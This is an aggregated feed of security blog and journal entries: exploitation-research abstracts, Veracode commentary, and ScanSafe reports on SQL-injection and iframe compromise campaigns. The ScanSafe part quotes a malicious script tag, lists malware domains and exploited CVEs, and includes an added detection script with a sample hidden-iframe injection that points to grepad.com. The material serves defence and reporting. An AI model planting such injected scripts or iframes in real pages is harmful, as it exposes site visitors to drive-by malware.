http://www.uninformed.org/uninformed.rss This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.

==> Mnemonic Password Formulas

http://www.uninformed.org/uninformed.rss The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recall termed Mnemonic Password Formulas.

==> Locreate: An Anagram for Relocate

http://www.uninformed.org/uninformed.rss This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation.

==> Exploiting 802.11 Wireless Driver Vulnerabilities on Windows

http://www.uninformed.org/uninformed.rss This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation.

==> Implementing a Custom X86 Encoder

http://www.uninformed.org/uninformed.rss This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder.

==> Preventing the Exploitation of SEH Overwrites

http://www.uninformed.org/uninformed.rss This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation.

==> Effective Bug Discovery

http://www.uninformed.org/uninformed.rss Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations.

==> Wars Within

http://www.uninformed.org/uninformed.rss In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play.

==> Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field

http://www.uninformed.org/uninformed.rss The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using.

==> Improving Automated Analysis of Windows x64 Binaries

http://www.uninformed.org/uninformed.rss As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can ...

==> Exploiting the Otherwise Non-Exploitable on Windows

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such ...

==> Abusing Mach on Mac OS X

http://www.uninformed.org/uninformed.rss This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, ...

==> GREPEXEC: Grepping Executive Objects from Pool Memory

http://www.uninformed.org/uninformed.rss As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to ...

==> Anti-Virus Software Gone Wrong

http://www.uninformed.org/uninformed.rss Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default ...

==> Bypassing PatchGuard on Windows x64

http://www.uninformed.org/uninformed.rss The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors ...

==> Windows Kernel-mode Payload Fundamentals

http://www.uninformed.org/uninformed.rss This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the ...

==> Analyzing Common Binary Parser Mistakes

http://www.uninformed.org/uninformed.rss With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it ...

==> Attacking NTLM with Precomputed Hashtables

http://www.uninformed.org/uninformed.rss Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with ...

==> Linux Improvised Userland Schedular Virus

http://www.uninformed.org/uninformed.rss This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to ...

==> FUTo

http://www.uninformed.org/uninformed.rss Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms ...

==> Thick Clients Gone Wrong

http://www.uninformed.org/uninformed.rss When designing thick-client based solutions, developers often suffer from the incorrect assumption that end-users are incapable of modifying, examining, or emulating the packaged client. Throughout this document, ...

==> Inside Blizzard: Battle.net

http://www.uninformed.org/uninformed.rss This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat ...

==> Temporal Return Addresses

http://www.uninformed.org/uninformed.rss Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit ...

==> Bypassing Windows Hardware-enforced DEP

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute ...

==> 802.11 VLANs and Association Redirection

http://www.uninformed.org/uninformed.rss The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. ...

==> Introduction to Reverse Engineering Win32 Applications

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of ...

==> Post-Exploitation on Windows using ActiveX Controls

http://www.uninformed.org/uninformed.rss When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound ...

==> Smart Parking Meters

http://www.uninformed.org/uninformed.rss Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper ...

==> Loop Detection

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and ...

==> Social Zombies: Aspects of Trojan Networks

http://www.uninformed.org/uninformed.rss Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft ...

==> Mac OS X PPC Shellcode Tricks

http://www.uninformed.org/uninformed.rss Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction ...

==> Annoyances Caused by Unsafe Assumptions

http://www.uninformed.org/uninformed.rss This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases ...

==> Verafied: Q&A With NSFOCUS

http://www.veracode.com/blog/?feed=rss2 Answered by Vann Abernethy, Senior Product Manager at NSFOCUS. 1. Tell us briefly about what NSFOCUS is all about. NSFOCUS is a global leader in active perimeter security. Our products and systems are crucial to some of the largest brand names and financial institutions and have been for more than a decade.

==> DARPA Joins Those Digging Deep Into Software Supply Chain

http://www.veracode.com/blog/?feed=rss2 The US Department of Defense is throwing money and resources at the problem of software supply chain security. Here's why supply chain security's time has come.

==> Enterprise Testing of Applications is a Growing Trend

http://www.veracode.com/blog/?feed=rss2 One of the things we clearly see in our platform is that more vendor applications are being tested. Our SoSS reports are not based on surveys that collect opinions; they are an analysis of data aggregated from companies as they test and secure their applications. Our platform tracks whether an application is being tested as part of an enterprise effort to test vendor software. The number of vendor apps tested is rising every quarter.

==> A Movember Update: Why We Mo

http://www.veracode.com/blog/?feed=rss2 The Veracode Movember effort still needs your help! - Donate Here. Movember has been an entertaining, interesting and at times embarrassing month. From the looks we garnered around the office, in public, or from family, friends and loved ones, it is at times hard to justify the Moustache. This is all easily rectified once you inform the onlookers about the underlying cause, raising awareness for Prostate Cancer.

==> The Merchant of Malta: Who’s To Blame When Vulns Fetch A Price?

http://www.veracode.com/blog/?feed=rss2 The security firm ReVuln found itself on the receiving end of some harsh criticism this month after it demonstrated several previously unknown holes in common industrial control platforms, then said it would not share the details of those holes to vendors. As information about software vulnerabilities becomes more and more valuable, the question arises: who is to blame when software gets hacked: the researcher who exposes the weakness, or the developers who created it?

==> In Case You Haven’t Heard, These Cloud and Big Data Things are REALLY Cool

http://www.veracode.com/blog/?feed=rss2 Having spent the last 10 years or so working with technology on a day-to-day basis, I thought I'd seen a good deal of "Woah, that is cool" moments. These moments range from just discovering modern day technology (the fact that companies made billions on database software blew my much younger mind for about a week) to more niche discoveries (my first identified SQL Injection vulnerability was a doozie, and I didn't even know it had a name until two years later!)

==> Identity Theft: Keeping Safe in an Online World Infographic

http://www.veracode.com/blog/?feed=rss2

==> Security Debt and Vulnerability Supply Chains

http://www.veracode.com/blog/?feed=rss2 When we were kicking around ideas for a new SoSS supplement, I thought the vendor testing angle could be interesting. We had just launched our VAST program so the topic made our marketing folks happy, but also because I think the supply chain analogy can be an interesting lens to view the security industry. We can think about the software supply chain as the vulnerability supply chain.

==> Software Security Needs Its Nate Silver

http://www.veracode.com/blog/?feed=rss2 Nate Silver, the rock star statistician behind the New York Times FiveThirtyEight blog, became an unwilling player in the heated political rhetoric ahead of the Nov. 6 Presidential election. Silver covers politics and other news from the viewpoint of a statistician: putting the rhetoric and the political consultants' alchemy aside to look at the numbers.

==> Spate of SpyEye Trojan Email

http://blog.scansafe.com/journal/rss.xml Beginning on May 5th, ScanSafe has observed numerous instances of a variant of the SpyEye family of trojans being delivered via email. The overwhelming majority of these are delivered via corporate mail; very few have been observed via free webmail services. The rate of encounter suggests the mail may be getting through corporate spam filtering at the affected locations. The body of the email contains a link that downloads a zip file containing the malware. The malware appears to be hosted on compromised websites in the following folder location: compromiseddomain\order\Order.zip The zip itself extracts into an executable. However, a double-extension ruse combined with multiple spaces makes it appear as if the file is actually a .doc file (the spaces push the .exe extension off the screen). Obviously this could trick many users into attempting to open the "doc", in which case they will actually infect their PC with the SpyEye trojan. ScanSafe detects and blocks this malware as: Mal/BredoZp-B, Mal/EncPk-YJ, Trojan.Win32.Menti.gjgn, Trojan-Spy.Win32.SpyEyes.hdy. First observed encounter was 05-may-11 at 11:38:05 GMT.

==> Lizamoon SQL Injection: 7 Months Old and Counting

http://blog.scansafe.com/journal/rss.xml The Lizamoon SQL injection attack is not new; it's actually part of a continuous SQLi attack that spans the past seven months. Lizamoon.com is just one of the more recent of the 40+ malware domains that have been used in the ongoing injection attacks. Here are some quick facts regarding the SQLi / Lizamoon compromises:
* A total of 42 malware domains have been observed during the 7 months this attack has been ongoing;
* The first encounter Cisco ScanSafe recorded was 20-sep-10 21:58:08 GMT;
* Only 0.15% (zero point one five percent) have involved encounters with functional / active malware domains;
* 99.85% of encounters have involved malware domains that were non-resolvable (shutdown / offline) at the time of encounter;
* 55% of the encounters occurred on March 25th when the Lizamoon domain was added;
* The high rate of encounters on the 25th was solely due to a single high-profile website that was compromised;
* Of the Lizamoon encounters on March 25th, only 0.13% were encounters with the live domain. 99.87% were non-resolvable (i.e. the domain was offline / not delivering content).
Here's the current list of domains we've observed in these attacks, from September 2010 through March 31, 2011:

==> Royal Engagement May Lead to Royal Malware Pains

http://blog.scansafe.com/journal/rss.xml The Telegraph reports "Royal memorabilia industry prepares to cash in" - The battle to cash in on Prince William's impending marriage to Kate Middleton has already begun, with an array of royal memorabilia set to flood the market. My first thought on reading this was that malware and scammers will be even quicker to cash in. Indeed, many are proclaiming that Prince William's and Kate Middleton's wedding (set for sometime next spring) will be the biggest marital event since Princess Di and Prince Charles. With that in mind, it's important to remember three things: 1. Major breaking news events are favorite themes for malware purveyors and scammers; 2. Clicking unsolicited links in email and IM is a frequent path of infection; 3. Criminals work fast - expect your favorite search engine to already be sprinkled liberally with malicious results regarding the engagement and upcoming nuptials. Cisco ScanSafe research indicates that 3 out of every 100 malware encounters result from people clicking unsolicited malicious links in email, IM and social messaging, and 10 out of every 100 encounters occur via search engine results. Bottom line - think before you click, consider the source, and pay attention to the destination URL. By following this advice, hopefully you can toast to the happy couple without toasting your computer.

==> Phish with a Side of Barbecue

http://blog.scansafe.com/journal/rss.xml Looks like the latest Bank of America phishing scam is springboarding off a couple of compromised websites. First, here's a look at the predictably worded phishing email: Dear Bank of America Customer, We recently have determined that different computers have logged in your Bank of America Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by July 31st, 2010, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. In order to confirm your Online Bank records, we may require some specific information from you. To restore your account, please Sign in to Online Banking. Here's where victims get sauced. The link behind "Sign in to Online Banking" actually points to gramsbbq.org/bain. Now gramsbbq.org is the legitimate website for Gram's Mission Barbecue Palace in Riverside, CA. The gramsbbq.org/bain page is a 302 redirect that leads to a phishing page hosted on a second compromised site: chasingarcadia.com (the website for Canadian band Chasing Arcadia). The actual phishing page is at: http://www.chasingarcadia.com/channel/safe.sslbankofamerica.com/index.htm This use of compromised sites as redirectors and phishing hosts enables the attackers to bypass reputation filters and/or community-based trust reporting. And it increases the collateral damage, because if/when the compromised sites are blacklisted, those businesses could suffer as a result.

==> WSJ a Victim, Not the Source, of SQL Injection

http://blog.scansafe.com/journal/rss.xml As mentioned earlier this week, about 7k pages (not sites) have been struck by SQL-injected iframes pointing to malware on robint.us. (That number has been over-inflated to over 100k or even a million due to poorly constructed search queries, which was the subject of the previous post on the topic.) Anyway, in some of the reports, one of the sites claimed to be compromised was that of the Wall Street Journal (WSJ.com). However, ScanSafe investigation reveals the SQL injection that appeared on certain pages of the WSJ site wasn't the result of a compromise of WSJ directly, but rather the result of a compromise of a third-party partner. That partner, adicio.com, provides real estate listings that are in turn displayed on certain pages of the WSJ.com website. Of course, from a site visitor's perspective, this might seem a bit semantic. But still, it is worth pointing out that it wasn't really wsj.com that was compromised.

==> Robint.us a Poster Child for Repeat Injections

http://blog.scansafe.com/journal/rss.xml One of many SQL injection attacks is getting some blogger attention, largely due to generic searches on the malware domain name. The malicious script tag on the compromised sites is: script src=http://ww.robint.us/u.js Search on the full tag with quotes and you get about 7k hits in Google. But search on just the domain name or omit the quotes and you get over a million hits. That's because the more generic search picks up any page that mentions the domain or includes any mix of those keywords. This loosely constructed search mistake causes some to believe the attack is much larger than it really is. Certainly 7k Web pages compromised is nothing to sneeze at, but it's certainly not a million pages and certainly nothing new - many of these same compromised pages have been repeatedly compromised in one SQL injection attack after another since 2007. On a more positive note, when SQL injection attacks first went mainstream a few years back, it wasn't uncommon to see a million+ pages compromised in a single attack. From that perspective, 7k is a vast improvement and shows that at least many sites are paying attention and taking the appropriate security measures. On the downside, attacks like robint.us are just one of over a thousand unique attacks carried out via the Web each month.

==> GoDaddy Attacks Top Web Malware in May

http://blog.scansafe.com/journal/rss.xml Some interesting stats from May.
* 16196 unique malicious domains.
* The top ten malicious domains comprised 23% of all Web malware attacks in May 2010.
* Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010.
* Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites.
* Gumblar was the second most prevalent Web malware encountered, at 7%.
* Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%.
Top Ten Malicious Domains, May 2010
holasionweb.com* - 7%
www.sitepalace.com - 3%
losotrana.com* - 2%
indesignstudioinfo.com* - 2%
kdjkfjskdfjlskdjf.com* - 2%
easfindnex.org - 2%
findermar.org - 2%
76.73.33.109 - 2%
findrasup.org - 1%
zettapetta.com* - 1%
*Related to attacks against GoDaddy-hosted websites
Top Ten Web Malware, May 2010
Trojan.JS.Redirector.cq - 14%
Exploit.JS.Gumblar - 7%
Backdoor.Win32.Alureon - 6%
Exploit.Java.CVE-2009-3867.d - 3%
Trojan.JS.Redirector.at - 3%
Downloader.JS.Agent.fhx - 2%
OI.Backdoor.Win32.Autorun.cx - 2%
OI.Win32.Susp.ms - 2%
Trojan.Iframe.f - 2%
Trojan.GIFIframe.a - 2%

==> WordPress Hacks: Not Just NetSol and GoDaddy

http://blog.scansafe.com/journal/rss.xml Over the past month or so, there have been a series of ongoing compromises which have been interchangeably blamed on WordPress, Network Solutions, or GoDaddy. However, the attacks are occurring on many other hosts as well, including: 1 & 1, DreamHost, In2Net, Hostway, Media Temple, ServerBeach and several others. While many of the compromised sites are using WordPress, some are not. The two main attacks are: (1) the Google / WordPress pharma attacks and (2) the Grepad.com family of attacks that netted Network Solutions hosted sites, some U.S. Treasury sites, and many, many popular niche 'mom and pop' style sites.
Google / WordPress Pharma Hacks
In the Google / WordPress pharma attack, the attackers are targeting popular Web pages and modifying the title tag of those pages to include a pharmaceutical sales pitch. Searches that would normally cause the legitimate site to appear in search engine results pages (SERPs) will also include the manipulated title tag. The link itself still points to the legitimate site, but modifications on the compromised site will cause an automatic redirect to the pharmaceutical site. Note that many of the sites that appear in Google SERPs for these title tags are not necessarily compromised. Quite often, blog and forum comments will adopt the title tag of the post, and spammers are using these same tags. For those that are compromised, currently the redirect points to "thepharmacydiscount.com/group/bestsellers.html?said=compromised.com", where compromised.com is the name of the legitimate (but compromised) site that is delivering the redirect. The point behind the Google / WordPress pharma attacks is to leverage the popularity ranking of the compromised sites, which boosts the SERPs ranking for the pharma keywords used.
Grepad.com Attacks
The intent of the Grepad.com family of attacks is not to gain favorable placement in SERPs to peddle counterfeit pharmaceuticals, but rather to download malware to the site visitors' PCs. Pages on the compromised websites are embedded with hidden iframes that load content from the malware domain. Multiple malware domains have been used in these attacks, including grepad.com, ginopost.com, bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Exploits of multiple vulnerabilities are attempted in order to download this malware. A list of observed exploits can be found in this blog post.
Commonalities Between Attacks
In both sets of attacks, the attackers are filtering based on whether the clickthrough to the site is a human or a search spider. In the pharma attacks, the malformed title is only presented to search spiders and the redirect only occurs if you click the link from SERPs. If you visit the site directly, by typing in the URL or from a non-SERPs link on another site, the legitimate page will load normally. The exact opposite is true with the Grepad.com family of attacks. In these cases, the filters suppress the compromise so that search spiders don't see the embedded iframe. If the link is accessed directly (or via a link from a non-search engine), then the iframe will be rendered. However, the attackers also drop a cookie when visitors hit a compromised page and suppress the iframe on subsequent visits. Filtering is also being done by IP address ranges, operating system, and user_agent to determine when the embedded iframe (or pharma redirect) will occur.
The Million Dollar Question: How?
The why is easy to answer: attackers want to make money. The how is a bit cloudier. It appears the attacker is able to read wp-config.php, which by necessity contains plaintext credentials for the WordPress database. Normally, wp-config.php should not be externally readable, unless the user has not properly configured file permissions. In any event, once initial access was gained, the attackers inserted or modified entries in the wp-option table for the active WordPress database. In subsequent phases (in the case of the Grepad family), the attackers modified php.ini / .htaccess, uploading malicious scripts which then embed the iframe. At this point, the attackers have the ability to plant PHP backdoors on the compromised sites, a precedent first set by Gumblar. The presence of the backdoor would allow continued access to the compromised sites, even after file permissions were properly configured or FTP credentials had been changed. And if proper segregation is not done, bleed-over to other sites on the same hosted share can still occur. It's worth noting that the U.S. Bureau of Engraving and Printing (bep.gov and moneyfactory.gov) were compromised in the most recent wave of the Grepad.com attacks. While neither of these sites appear to have been using WordPress, both were hosted by Network Solutions and appear to have been published with Network Solutions Website Builder.

==> Grepad.com Iframe Nets Gov't, Niche Sites

http://blog.scansafe.com/journal/rss.xml ScanSafe traffic analysis reveals that a number of government and popular niche websites have been embedded with a malicious script inserted after the closing html tag. The script first drops a cookie to identify repeat visitors, then loads an iframe pointing to grepad.com. In turn, grepad.com redirects to ginopost.com, which attempts to exploit a series of vulnerabilities. Observed exploits include:
* Adobe Reader and Acrobat util.printf stack-based buffer overflow (CVE-2008-2992)
* Adobe Reader and Acrobat getIcon stack-based buffer overflow (CVE-2009-0927)
* Office OCX OpenWebFile (BID-33243)
* Symantec AppStream LaunchObj ActiveX control (CVE-2008-4388)
* Hummingbird PerformUpdateAsync (CVE-2008-4728)
* Peachtree ExecutePreferredApplication (CVE-2008-4699)
* C6 Messenger propDownloadUrl (CVE-2008-2551)
* Internet Explorer memory corruption (MS09-002)
The malware host, ginopost.com, was registered on April 25th, using the same IP address (188.124.16.104) as a series of malware hosts that have been engaged in attacks on WordPress blogs hosted by Network Solutions. Previous malware domains using that IP include bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Attacks on WordPress-published websites have not been restricted to those hosted by Network Solutions; a separate ongoing series of attacks has also targeted WordPress-published sites hosted by GoDaddy.
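
Both this item and the Grepad.com writeup above describe cloaking: the injected script and iframe are served only to some requests (a human User-Agent, arrival from a search-engine Referer, no cookie yet), so a single fetch of a suspect page can come back clean. The check below is an added example, not code from ScanSafe: it requests the same URL under several header profiles and diffs the responses for iframe hosts and for any content after the closing html tag. The response bodies are constructed inline so the example runs offline; grepad.com, the cookie name `visited` and the header values are illustrative assumptions.

```python
"""Cloaking check for the hidden-iframe injections described in the two
ScanSafe items above.  Added example, not code from ScanSafe.

The attackers serve the injected content only to some requests (human
User-Agent, arrival from a search-engine Referer, no cookie yet), so a single
fetch can miss it.  The check requests the same URL under several header
profiles and diffs what comes back.  Nothing is fetched here: the response
bodies are constructed inline, and grepad.com, the cookie name and the header
values are illustrative assumptions.
"""
import re
import urllib.request
from urllib.parse import urlsplit

IFRAME_SRC = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
CLOSE_HTML = re.compile(r'</html\s*>', re.I)


def request_profiles() -> dict:
    """Header sets that exercise each filter the attackers were observed using."""
    bot = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    browser = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/30.0 Safari/537.36"
    return {
        "spider":         {"User-Agent": bot},
        "browser_direct": {"User-Agent": browser},
        "browser_serp":   {"User-Agent": browser, "Referer": "http://www.google.com/search?q=site"},
        "browser_repeat": {"User-Agent": browser, "Cookie": "visited=1"},  # assumed cookie name
    }


def content_after_html(body: str) -> str:
    """Text appended after the last </html>; a legitimate page has none."""
    last = None
    for m in CLOSE_HTML.finditer(body):
        last = m
    return body[last.end():].strip() if last else ""


def iframe_hosts(body: str) -> set:
    """Hostnames of every iframe src, including ones built inside document.write()."""
    hosts = set()
    for src in IFRAME_SRC.findall(body):
        host = urlsplit(src).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def analyse(variants: dict) -> dict:
    """Compare responses to one URL fetched under different profiles.

    'cloaked' is True when the iframe hosts or the presence of post-</html>
    content differ between profiles; 'iframe_hosts' is the union over profiles.
    """
    findings = {}
    for name, body in variants.items():
        findings[name] = {
            "iframe_hosts": sorted(iframe_hosts(body)),
            "trailing": bool(content_after_html(body)),
        }
    signatures = {(tuple(f["iframe_hosts"]), f["trailing"]) for f in findings.values()}
    injected = sorted({h for f in findings.values() for h in f["iframe_hosts"]})
    return {"profiles": findings, "cloaked": len(signatures) > 1, "iframe_hosts": injected}


def fetch_variants(url: str, timeout: float = 10.0) -> dict:
    """Live version: the same URL under each profile.  Not exercised offline."""
    out = {}
    for name, headers in request_profiles().items():
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            out[name] = resp.read().decode("utf-8", "replace")
    return out


# Constructed responses standing in for what fetch_variants() would return.
CLEAN = "<html><head><title>Agency news</title></head><body><p>Hello</p></body></html>\n"
INJECTED = CLEAN + (
    '<script>document.cookie="visited=1; path=/";'
    "document.write('<iframe src=\"http://grepad.com/in.php\" width=\"1\" "
    "height=\"1\" style=\"visibility:hidden\"></iframe>');</script>\n"
)
SAMPLE_VARIANTS = {
    "spider": CLEAN,             # filter hides the compromise from crawlers
    "browser_direct": INJECTED,  # human visitor, first visit: iframe served
    "browser_serp": INJECTED,
    "browser_repeat": CLEAN,     # cookie already set: iframe suppressed
}

if __name__ == "__main__":
    report = analyse(SAMPLE_VARIANTS)
    print("cloaked:", report["cloaked"], "iframe hosts:", report["iframe_hosts"])
```

Run `fetch_variants()` only from an isolated machine, since the browser-profile response is the one that carries the exploit chain. Any non-empty content after `</html>` is a finding on its own, even when the iframe host is not yet on a blocklist, and the IP-range filtering mentioned above means a clean result from one network is not conclusive.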

==> Anti-Virus, now with added Michelangelo

http://blogs.securiteam.com/index.php/feed/ Apparently it’s all our fault. Again. Not only is anti-virus useless, but we’re responsible for the evolution and dramatically increased volume of malware. According to something I read today, “If it wasn't for the security industry the malware that was written back in the 90s might still be working today.” I guess that’s not as [...]

==> Why can’t my laptop figure out what time zone I’m in, like my cell phone does?

http://blogs.securiteam.com/index.php/feed/ We got new cell phones (mobiles, for you non-North Americans) recently. In the time since we last bought phones they have added lots of new features, like texting, cameras, email and Google Maps. This, plus the fact that I am away on a trip right now, and Gloria has to calculate what time it is [...]

==> Blatant much?

http://blogs.securiteam.com/index.php/feed/ So a friend of mine posts (on Twitter) a great shot of a clueless phishing spammer: So I reply: @crankypotato Were only all such phishing spammers so clueless. (Were only all users clueful enough to notice …) So some other scammer tries it out on me: Max Dubberly @Maxt4dxsviida @rslade http://t.co/(dangerous URL that I’m not [...]

==> I *thought* “Gangnam style” looked familiar …

http://blogs.securiteam.com/index.php/feed/ Remember “Monty Python and the Holy Grail“?

==> Still think “climate change” is just an academic curiosity?

http://blogs.securiteam.com/index.php/feed/ “A study conducted by scientists at the Royal Botanic Gardens, Kew (UK), in collaboration with scientists in Ethiopia, reports that climate change alone could lead to the extinction of wild Arabica coffee (Coffea arabica) well before the end of this century.” Not so smug now, are you? (I trust I do not have to explain [...]

==> REVIEW: “The Quantum Thief”, Hannu Rajaniemi

http://blogs.securiteam.com/index.php/feed/ BKQNTTHF.RVW 20120724 “The Quantum Thief”, Hannu Rajaniemi, 2010, 978-1-4104-3970-3 %A Hannu Rajaniemi %C 175 Fifth Avenue, New York, NY 10010 %D 2010 %G 978-1-4104-3970-3 0765367661 %I Tor Books/Tom Doherty Assoc. %O pnh@tor.com www.tor.com %O http://www.amazon.com/exec/obidos/ASIN/0765367661/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0765367661/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0765367661/robsladesin03-20 %O Audience n Tech 1 Writing 2 (see revfaq.htm for explanation) %P 466 p. %T “The Quantum [...]

==> Apple Now “Owns” the Page Turn

http://blogs.securiteam.com/index.php/feed/ A blog posting at the New York Times: “Yes, that’s right. Apple now owns the page turn. You know, as when you turn a page with your hand. An “interface” that has been around for hundreds of years in physical form. I swear I’ve seen similar animation in Disney or Warner Brothers cartoons. (This is [...]

==> Border (relative) difficulties

http://blogs.securiteam.com/index.php/feed/ I have experienced all kinds of difficulties travelling down to the US to teach. It used to be a lot easier, in the old days. Border agent: “Business or pleasure?” Me: “Business.” BA: “What are you doing?” Me: “Teaching.” BA: “OK.” Then The-Conservative-Government-Before-The-New-Harperite-Government-Of-Canada decided, in its infinite wisdom, to bring in something called the North [...]

==> User interface

http://blogs.securiteam.com/index.php/feed/ The food fair area of one of the local mall had a facelift recently. Now, as you walk down the hall towards the washrooms, the first thing you see is a lighted sign stating “WOMEN” on the first hallway that tak